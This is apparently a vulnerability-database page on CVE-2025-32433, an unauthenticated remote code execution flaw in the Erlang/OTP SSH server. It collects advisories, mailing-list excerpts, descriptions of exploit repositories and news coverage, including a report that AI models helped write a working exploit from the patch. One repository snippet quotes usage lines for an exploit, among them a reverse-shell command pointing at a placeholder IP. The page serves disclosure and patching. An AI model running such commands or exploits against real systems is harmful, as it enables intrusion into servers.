10
CVSSv3

CVE-2025-32433

CVSSv4: NA | CVSSv3: 10 | CVSSv2: NA | VMScore: 1000 | EPSS: 0.70459 | KEV: Exploitation Reported
Published: 16/04/2025 Updated: 25/04/2025

Vulnerability Summary

Unauthenticated Remote Code Execution in Erlang/OTP SSH Server Before Specified Versions

Erlang/OTP, a set of libraries for the Erlang programming language, contains a critical SSH server vulnerability that allows unauthenticated remote code execution prior to specific version updates. An attacker can exploit a flaw in SSH protocol message handling to gain unauthorized system access and execute arbitrary commands without valid credentials. The vulnerability affects versions before OTP-27.3.3, OTP-26.2.5.11, and OTP-25.3.2.20. These specific versions include patches that address the security issue. Users can mitigate the risk by updating to the patched versions or implementing temporary workarounds such as disabling the SSH server or blocking access through firewall rules.

Vulnerability Trend

Vulnerable Product Search on Vulmon Subscribe to Product

erlang otp

Vendor Advisories

Debian Bug report logs - #1103442 erlang: CVE-2025-32433 Package: src:erlang; Maintainer for src:erlang is Debian Erlang Packagers <pkg-erlang-devel@listsaliothdebianorg>; Reported by: Salvatore Bonaccorso <carnil@debianorg> Date: Thu, 17 Apr 2025 18:42:01 UTC Severity: grave Tags: fixed-upstream, security, upstr ...

Mailing Lists

Hi all, ### Am I affected? ### Impact ### Mitigation ### Advisory Best regards, Fabian Bäumer -- M Sc Fabian Bäumer Chair for Network and Data Security Ruhr University Bochum Universitätsstr 150, Building MC 4/145 44780 Bochum Germany ...
Hi all, ### Details Client Server        -------Version Banner------->       <-------Version Banner-------        ------SSH_MSG_KEXINIT------->       <------SSH_MSG_KEXINIT--------        ...
On Wed, Apr 16, 2025 at 07:28:58PM +0200, Fabian Bäumer wrote: Matt Keeley (CC'ed) has just published an exploit at: githubcom/ProDefense/CVE-2025-32433 I'm also attaching the files to this message for archival These correspond to the first and currently the only commit in the above repo, commit hash 7936ef1cae51717e191328f3f571bf8a ...
Hi Alexander, Thanks for the correction :) Best regards, Fabian Bäumer M Sc Fabian Bäumer Chair for Network and Data Security Ruhr University Bochum Universitätsstr 150, Building MC 4/145 44780 Bochum Germany Am 19042025 um 01:20 schrieb Solar Designer: ...
Hi Fabian, Thank you very much for this discovery and for the additional detail On Fri, Apr 18, 2025 at 02:01:44PM +0200, Fabian Bäumer wrote: For others looking this up, it's actually SSHamble (without the "s"): wwwrunzerocom/sshamble/ githubcom/runZeroInc/sshamble How did your team find this vulnerability? Manual audit ...

Github Repositories

Build » git clone githubcom/0xPThree/cve-2025-32433git && cd cve-2025-32433 » docker build -t erlang-ssh » docker run -d --name erlang-ssh -p 2222:2222 erlang-ssh POC kdev :: ~/erlang/CVE-2025-32433 ‹main*› » python3 cve-2025-32433py -h usage: cve-2025-32433py [-h] [-d] [

This script is a custom security tool designed to test for a critical pre-authentication vulnerability in systems running Erlang-based SSH servers

CVE-2025-32433_Erlang-OTP This script is a custom security tool designed to test for a critical pre-authentication vulnerability in systems running Erlang-based SSH servers This script is a custom security tool designed to test for a critical pre-authentication vulnerability in systems running Erlang-based SSH servers (such as those used in embedded systems, IoT devices, and so

CVE-2025-32433 RCE Exploit

CVE-2025-32433 Erlang-OTP-SSH-RCE-EXP The vulnerability allows an attacker with network access to an Erlang/OTP SSH server to execute arbitrary code without prior authentication Description A serious vulnerability has been identified in the Erlang/OTP SSH server that may allow an attacker to perform unauthenticated remote code execution (RCE) By exploiting a flaw in SSH proto

⚠️ Ethical Disclaimer This repository contains code that demonstrates a real CVE (CVE-2025-32433) Use it only in environments where you have explicit authorization Never test this exploit against systems you do not own or manage Unauthorized use is illegal, unethical, and harmful to the cybersecurity community simulated and real POC FOR CVE-2025-32433 My homie Chocapikk

This script is a custom security tool designed to test for a critical pre-authentication vulnerability in systems running Erlang-based SSH servers

CVE-2025-32433_Erlang-OTP This script is a custom security tool designed to test for a critical pre-authentication vulnerability in systems running Erlang-based SSH servers This script is a custom security tool designed to test for a critical pre-authentication vulnerability in systems running Erlang-based SSH servers (such as those used in embedded systems, IoT devices, and so

CVE-2025-32433 https://github.com/erlang/otp/security/advisories/GHSA-37cp-fgq5-7wc2

CVE-2025-32433 🛡️ Welcome to the CVE-2025-32433 repository This project focuses on the security vulnerability identified as CVE-2025-32433 You can find more details about this vulnerability in the official advisory here Table of Contents Introduction Description Vulnerability Details Installation Usage Contributing License Contact Releases Introduction CVE-2025-32433

Erlang/OTP is a set of libraries for the Erlang programming language. Prior to versions OTP-27.3.3, OTP-26.2.5.11, and OTP-25.3.2.20, a SSH server may allow an attacker to perform unauthenticated remote code execution (RCE). By exploiting a flaw in SSH protocol message handling

##VIETNAMESE## 🧠 Gợi ý sử dụng: Kiểm tra tệp tạo: python3 elaina_cve_2025_32433py 192168110 22 'touch /tmp/pwned_by_elaina' Reverse shell: python3 elaina_cve_2025_32433py 192168110 22 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1' 🔏 Ghi chú: Script không cần SSH key hoặc mậ

Security research on Erlang/OTP SSH CVE-2025-32433.

CVE-2025-32433py Security research on Erlang/OTP SSH CVE-2025-32433 Python exploit Proof-of-Concept CVE-2025-32433 Unauthenticated Remote Code Execution in Erlang/OTP SSH The Suricata and Bro logs are in order based on a succesful Paramiko attack, OpenSSH regular connection (no attack) and two succesful attacks using githubcom/ProDefense/CVE-2025-32433/blob/main/CVE

explo/

explo/ Rogue Printer LAN RCE (Ubuntu 2204): cups-browsed_201 Remote Python Module Importing: gitrojan LLM on Silicon (Darwin M1): llmsili CVE-2025-32433 (pyc): pyc

CVE-2025-32433 Erlang SSH Library Exploit 🛑

Blackash-CVE-2025-32433 CVE-2025-32433 Erlang SSH Library Exploit 🛑

python script to find vulnerable targets of CVE-2025-32433

erl_mouse python script to find vulnerable targets of CVE-2025-32433

This Python script exploits the CVE-2025-32433 vulnerability in certain versions of the Erlang SSH daemon.

Erlang-OTP-CVE-2025-32433 This Python script exploits the CVE-2025-32433 vulnerability in certain versions of the Erlang SSH daemon By sending a desynchronized sequence of SSH messages, it achieves remote code execution (RCE) on vulnerable servers Disclaimer: This script is intended for educational purposes and authorized penetration testing only Unauthorized use against sys

SimpleHelp remote support software (VE-2024-57727) Erlang-OTP-CVE-2025-32433

CVE-2025-32433 Summary and Attack Overview

CVE-2025-32433 CVE-2025-32433 Summary and Attack Overview

Written for deepening my understanding of CVE-2025-32433, and more practice in Go.

CVE-2025-32433 Remote Shell Go-based exploit for CVE-2025-32433 returning a remote bash shell Heavily inspired by understanding of exploit derived from ProDefense's PoC for CVE-2025-32433 Running the Exploit make then execute the exploit binary in one of 2 ways: exploitexe if you are on a Windows machine Command /exploit &

This script is a custom security tool designed to test for a critical pre-authentication vulnerability in systems running Erlang-based SSH servers

CVE-2025-32433_Erlang-OTP This script is a custom security tool designed to test for a critical pre-authentication vulnerability in systems running Erlang-based SSH servers This script is a custom security tool designed to test for a critical pre-authentication vulnerability in systems running Erlang-based SSH servers (such as those used in embedded systems, IoT devices, and so

Exploit Erlang/OTP SSH CVE-2025-32433 in a lab setup.

Erlang-OTP-SSH-CVE-2025-32433 Exploit Erlang/OTP SSH CVE-2025-32433 in a lab setup Erlang and its companion framework, the Open Telecom Platform (OTP), form a powerful ecosystem for building distributed fault-tolerant systems Erlang is a programming language designed to build scalable real-time systems that require high availability Originally, Erlang was developed by Ericss

Exploitation module for CVE-2025-21293 (Erlang/OTP)

Vulnerable Application Erlang/OTP is a set of libraries for the Erlang programming language Prior to versions OTP-2733, OTP-262511, and OTP-253220, a SSH server may allow an attacker to perform unauthenticated remote code execution (RCE) By exploiting a flaw in SSH protocol message handling, a malicious actor could gain unauthorized access to affected systems and exec

Missing Authentication for Critical Function (CWE-306)-Exploit

CVE-2025-32433 Missing Authentication for Critical Function (CWE-306)-Exploit

The vulnerability allows an attacker with network access to an Erlang/OTP SSH server to execute arbitrary code without prior authentication.

CVE-2025-32433-Erlang-OTP-SSH-RCE-PoC The vulnerability allows an attacker with network access to an Erlang/OTP SSH server to execute arbitrary code without prior authentication

CVE-2025-32433 - Critical Erlang/OTP SSH Vulnerability Overview 🔍 CVE-2025-32433 is a critical vulnerability discovered in Erlang/OTP's SSH implementation that allows unauthenticated remote code execution via specially crafted SSH messages This severe security flaw enables attackers to execute arbitrary code on affected systems without authentication What: Remote Co

A proof-of-concept exploit for CVE-2025-32433, a critical vulnerability in Erlang's SSH library that allows pre-authenticated code execution via malformed SSH_MSG_CHANNEL_REQUEST packets.

CVE-2025-32433 Erlang SSH Library Exploit A proof-of-concept exploit for CVE-2025-32433, a critical vulnerability in Erlang's SSH library that allows pre-authenticated code execution via malformed SSH_MSG_CHANNEL_REQUEST packets Features Original exploit by Matthew Keeley Updated version by Tyler Ramsbey: Command‑line arguments for LHOST, LPORT, RHOST, and RPORT Buil

👋 Hi, I’m Bilal Azam 🛡️ Cybersecurity Graduate | SIEM & SOC Analyst | 📍 Vaasa, Finland 👨‍💻 About Me 🎓 IT Graduate from Vaasa University of Applied Sciences 🔐 Focus: Threat Detection, SOC, OT Security, Python Scripting 💡 Tools: ELK Stack • Suricata • Winlogbeat • Sysmon • Wireshark 🎯 Learning: MITRE ATT&

🛡️ Cybersecurity News Tracker Last updated: April 29, 2025 at 01:13 UTC Automatically aggregated cybersecurity news from various sources 📋 Table of Contents 🔍 Critical Infrastructure 🔍 China Cyber 🔍 Russian Cyber 🔍 Iranian Cyber 🔍 North Korean Cyber 🔍 CVEs 🔍 POC Exploits 🔍 Exploited Vulnerabilities 🔍 Satellites 🔍 Cyber Attacks 🔍 Cryp

Recent Articles

Public exploits released for critical Erlang/OTP SSH flaw, patch now
BleepingComputer • Lawrence Abrams • 19 Apr 2025

Public exploits released for critical Erlang/OTP SSH flaw, patch now By Lawrence Abrams April 19, 2025 10:05 AM 0 Public exploits are now available for a critical Erlang/OTP SSH vulnerability tracked as CVE-2025-32433, allowing unauthenticated attackers to remotely execute code on impacted devices. Researchers at the Ruhr University Bochum in Germany disclosed the flaw on Wednesday, warning that all devices running the daemon were vulnerable. "The issue is caused by a flaw in the SSH p...

Critical Erlang/OTP SSH pre-auth RCE is 'Surprisingly Easy' to exploit, patch now
BleepingComputer • Lawrence Abrams • 17 Apr 2025

Critical Erlang/OTP SSH pre-auth RCE is 'Surprisingly Easy' to exploit, patch now By Lawrence Abrams April 17, 2025 05:34 PM 0 A critical vulnerability in the Erlang/OTP SSH, tracked as CVE-2025-32433, has been disclosed that allows for unauthenticated remote code execution on vulnerable devices. The flaw was discovered by Fabian Bäumer, Marcus Brinkmann, Marcel Maehren, and Jörg Schwenk of the Ruhr University Bochum in Germany and given a maximum severity score of 10.0. All dev...

Today's LLMs craft exploits from patches at lightning speed
The Register

Topics Security Off-Prem On-Prem Software Offbeat Special Features Vendor Voice Vendor Voice Resources Erlang? Er, man, no problem. ChatGPT, Claude to go from flaw disclosure to actual attack code in hours Microsoft rated this bug as low exploitability. Miscreants weaponized it in just 8 days

The time from vulnerability disclosure to proof-of-concept (PoC) exploit code can now be as short as a few hours, thanks to generative AI models. Matthew Keely, of Platform Security and penetration testing firm ProDefense, managed to cobble together a working exploit for a critical vulnerability in Erlang's SSH library (CVE-2025-32433) in an afternoon, although the AI he used had some help - the model was able to use code from an already published patch in the library to hunt down which holes ha...